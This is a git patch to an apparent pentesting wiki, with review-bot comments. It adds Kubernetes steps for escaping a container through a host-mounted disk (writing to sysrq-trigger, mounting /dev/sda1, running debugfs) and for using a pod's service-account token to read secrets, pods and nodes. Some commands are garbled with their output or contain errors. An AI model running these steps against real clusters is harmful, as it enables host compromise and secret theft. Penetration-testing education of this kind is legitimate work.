From 9d55f280641dae9e6a80de8e0801dbb43501933f Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 27 Apr 2021 23:18:16 +0000 Subject: [PATCH] GitBook: [master] 5 pages modified --- SUMMARY.md | 3 +- .../privilege-escalation/docker-breakout.md | 18 +++ .../README.md} | 21 ++- .../enumeration-from-a-pod.md | 125 ++++++++++++++++++ 4 files changed, 154 insertions(+), 13 deletions(-) rename pentesting/{pentesting-kubernetes.md => pentesting-kubernetes/README.md} (99%) create mode 100644 pentesting/pentesting-kubernetes/enumeration-from-a-pod.md diff --git a/SUMMARY.md b/SUMMARY.md index 46bc363d..ab0ca18e 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -170,7 +170,8 @@ * [Print Job Retention](pentesting/pentesting-printers/print-job-retention.md) * [Scanner and Fax](pentesting/pentesting-printers/scanner-and-fax.md) * [Pentesting SAP](pentesting/pentesting-sap.md) -* [Pentesting Kubernetes](pentesting/pentesting-kubernetes.md) +* [Pentesting Kubernetes](pentesting/pentesting-kubernetes/README.md) + * [Enumeration from a Pod](pentesting/pentesting-kubernetes/enumeration-from-a-pod.md) * [7/tcp/udp - Pentesting Echo](pentesting/7-tcp-udp-pentesting-echo.md) * [21 - Pentesting FTP](pentesting/pentesting-ftp/README.md) * [FTP Bounce attack - Scan](pentesting/pentesting-ftp/ftp-bounce-attack.md) diff --git a/linux-unix/privilege-escalation/docker-breakout.md b/linux-unix/privilege-escalation/docker-breakout.md index b0308fd8..a46f1560 100644 --- a/linux-unix/privilege-escalation/docker-breakout.md +++ b/linux-unix/privilege-escalation/docker-breakout.md 
@@ -470,6 +470,24 @@ capsh --print #You can abuse the SYS_MODULE capability ``` +## Writable hostPath Mount + +\(Info from [**here**](https://medium.com/swlh/kubernetes-attack-path-part-2-post-initial-access-1e27aabda36d)\) Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector: + +```bash +#### Check if You Can Write to a File-system +$ echo 1 > /proc/sysrq-trigger + +#### Check root UUID +$ cat /proc/cmdlineBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300- Check Underlying Host Filesystem +$ findfs UUID=/dev/sda1- Attempt to Mount the Host's Filesystem +$ mkdir /mnt-test +$ mount /dev/sda1 /mnt-testmount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now. + +#### debugfs (Interactive File System Debugger) +$ debugfs /dev/sda1 +``` + ## Seccomp in Docker This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker: diff --git a/pentesting/pentesting-kubernetes.md b/pentesting/pentesting-kubernetes/README.md similarity index 99% rename from pentesting/pentesting-kubernetes.md rename to pentesting/pentesting-kubernetes/README.md index e4e53981..2614725c 100644 --- a/pentesting/pentesting-kubernetes.md +++ b/pentesting/pentesting-kubernetes/README.md 
@@ -29,7 +29,7 @@ Security tips for Kubernetes * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application \(so usually, a pod run just 1 container\). The pod is the way kubernetes abstracts the container technology running. * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** \(with a different internal IP\) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints` -![](../.gitbook/assets/image%20%28466%29.png) +![](../../.gitbook/assets/image%20%28466%29.png) * **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods \(through API server\). The kubelet doesn’t manage containers that were not created by Kubernetes. * **Kube-proxy**: is the service in charge of the communications \(services\) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors. 
@@ -155,7 +155,7 @@ kubectl apply -f deployment.yml Each configuration file has 3 parts: **metadata**, **specification** \(what need to be launch\), **status** \(desired state\). Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run: -![](../.gitbook/assets/image%20%28458%29.png) +![](../../.gitbook/assets/image%20%28458%29.png) #### Example of Deployment + Service declared in the same configuration file \(from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)\) @@ -346,10 +346,14 @@ helm search Helm is also a template engine that allows to generate config files with variables: -![](../.gitbook/assets/image%20%28465%29.png) +![](../../.gitbook/assets/image%20%28465%29.png) ## PART 2 - VULNERABILITIES and some fixes. +### Enumeration inside a Pod + +{% page-ref page="enumeration-from-a-pod.md" %} + ### Vulnerabilities - kubernetes secrets A Secret is an object that contains sensitive data such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**. @@ -632,7 +636,7 @@ kubectl get secret test-secret -oyaml Do not forget to delete de secrets and re-create them again in order to apply the encryption layer. -### Final tips: +#### Final tips: * Try not to keep secrets in the FS, get them from other places. * Check out [https://www.vaultproject.io/](https://www.vaultproject.io/) for add more protection to your secrets. 
@@ -656,14 +660,7 @@ kubectl exec pod -it -- bash Once inside the container: ```text -root@pod01:/# uname -r -``` - -If you want to gather information you could use: - -```text -strace uname -r -ltrace uname -r +uname -r ``` When the attack achieves discovering the kernel version, he could run exploiting techniques to gather information or escalate into the OS. diff --git a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md new file mode 100644 index 00000000..3330ff5a --- /dev/null +++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md 
@@ -0,0 +1,125 @@ +# Enumeration from a Pod + +## Enumeration + +In a situation where you have managed to break into a Kubernetes Pod you could start enumerating the kubernetes environment from within. + +Usually in the directory `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount` you can find the files: + +* **ca.crt**: It's the ca certificate to check kubernetes communications +* **namespace**: It indicates the current namespace +* **token**: It contains the auth token of the current pod. + +To enumerate the environment you can upload the [**kubectl**](https://kubernetes.io/es/docs/tasks/tools/install-kubectl/) binary and use it. Also, using the **token** obtained before you can manually access some endpoints of the **API Server**. +In order to find the the IP of the API service check the environment for a variable called `KUBERNETES_SERVICE_HOST`. + +### Get namespaces + +{% tabs %} +{% tab title="kubectl" %} +```bash +./kubectl get namespaces +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/ +``` +{% endtab %} +{% endtabs %} + +### Get Current Privileges + +{% tabs %} +{% tab title="kubectl" %} +```bash +./kubectl auth can-i --list #Get privileges in current namespace +./kubectl auth can-i --list -n custnamespace #Get privileves in custnamespace +``` +{% endtab %} +{% endtabs %} + +### Get secrets + +{% tabs %} +{% tab title="kubectl" %} +```text +./kubectl get secrets +./kubectl get secrets -n custnamespace +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/default/secrets/ + +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/custnamespace/secrets/ +``` +{% endtab %} +{% endtabs %} + +### Get deployments + +{% tabs %} +{% tab title="kubectl" %} +```text +./kubectl get deployments +./kubectl get deployments -n custnamespace +``` +{% endtab %} + +{% tab 
title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/default/deployments/ + +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/custnamespace/deployments/ +``` +{% endtab %} +{% endtabs %} + +### Get deployments + +{% tabs %} +{% tab title="kubectl" %} +```text +./kubectl get pods +./kubectl get pods -n custnamespace +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/default/pods/ + +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/custnamespace/pods/ +``` +{% endtab %} +{% endtabs %} + +### Get deployments + +{% tabs %} +{% tab title="kubectl" %} +```text +./kubectl get nodes +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/nodes/ +``` +{% endtab %} +{% endtabs %} + + +
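Review bot: in the docker-breakout.md hunk (`## Writable hostPath Mount`), the pasted command output has been fused onto the same lines as the commands, so `$ cat /proc/cmdlineBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic ...`, `$ findfs UUID=/dev/sda1- Attempt to Mount the Host's Filesystem` and `$ mount /dev/sda1 /mnt-testmount: /mnt: permission denied.` are neither readable nor runnable; split each into the command, its output on the next line, and a `####` comment for the following step (the `findfs` call also needs the UUID from the `root=UUID=...` value as its argument, with `/dev/sda1` being its output). Two further points: `echo 1 > /proc/sysrq-trigger` is labelled a writable-filesystem check, but `/proc/sysrq-trigger` is the host kernel's magic SysRq interface (a digit sets the console log level, `b` reboots the host), and Docker's default profile mounts it read-only, so a successful write tells you the container is running without the default read-only `/proc` paths, not anything about a hostPath volume, and a slip there is destructive; state that meaning, or use a harmless probe like `touch` inside the suspected mount. Also, the `mount /dev/sda1` and `debugfs /dev/sda1` steps operate on the host's root block device, which requires the device node to be visible inside the container plus `CAP_SYS_ADMIN` for `mount` (debugfs only needs read access to the device, `-w` for writes); that is a different prerequisite from a writable hostPath volume, so the heading or an opening sentence should say which situation the steps cover. The error text mentions `/mnt` while the command mounts on `/mnt-test`, which suggests the output was taken from a different run.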
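Review bot: the `@@ -29` README.md hunk only fixes the image path, but its context lines describe the kubelet as establishing "communication between node and kubectl" and kube-proxy as handling communications "between the apiserver and the node"; the kubelet registers the node with and receives pod specs from the kube-apiserver (kubectl is just the client CLI), and kube-proxy programs node networking (iptables or IPVS) so that Service virtual IPs reach pod endpoints rather than carrying apiserver-to-node traffic. Since the file is being moved anyway, this is a good moment to correct both sentences.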
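Review bot: in the `@@ -656` README.md hunk, the trailing context sentence "When the attack achieves discovering the kernel version, he could run exploiting techniques" is ungrammatical; since the hunk already edits this block, "Once the attacker has discovered the kernel version, they can look for kernel exploits to gather information or escalate into the host OS" reads cleanly. Dropping the `strace`/`ltrace` lines is fine, as tracing `uname` adds nothing over the `uname -r` output itself.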
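Review bot: in the new enumeration-from-a-pod.md hunk, the API tab for deployments requests `/api/v1/namespaces/default/deployments/`, but Deployments belong to the `apps` API group, so the path is `/apis/apps/v1/namespaces/default/deployments` (the `/api/v1` core paths are correct for namespaces, secrets, pods and nodes). Related fixes in the same hunk: the last two `### Get deployments` headings sit above `kubectl get pods` and `kubectl get nodes` and should read `### Get pods` and `### Get nodes`; the curl lines end in `Authorization: Bearer ` and `https://:/api/...` with nothing after them, presumably angle-bracket placeholders swallowed by the renderer, so use `$TOKEN` and `$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT` (both variables are injected into every pod, and `kubernetes.default.svc` resolves to the same service) so they survive publishing; the API server presents a certificate signed by the cluster CA, so these curl calls fail TLS verification unless they pass `--cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt`, which is exactly the file the section lists, or `--insecure`. The "Get Current Privileges" section has no API tab; `kubectl auth can-i --list` is backed by a `POST` of a `SelfSubjectRulesReview` to `/apis/authorization.k8s.io/v1/selfsubjectrulesreviews` with `spec.namespace` set, which would round out the tabs. Smaller points: the `token` file is the token of the pod's service account rather than "of the current pod", so its permissions are those bound to that service account via RBAC; on most images `/var/run` is a symlink to `/run`, so the two directories listed are the same one; and there are typos in "privileves" and "the the IP", while the kubectl link points at the Spanish docs (`/es/`).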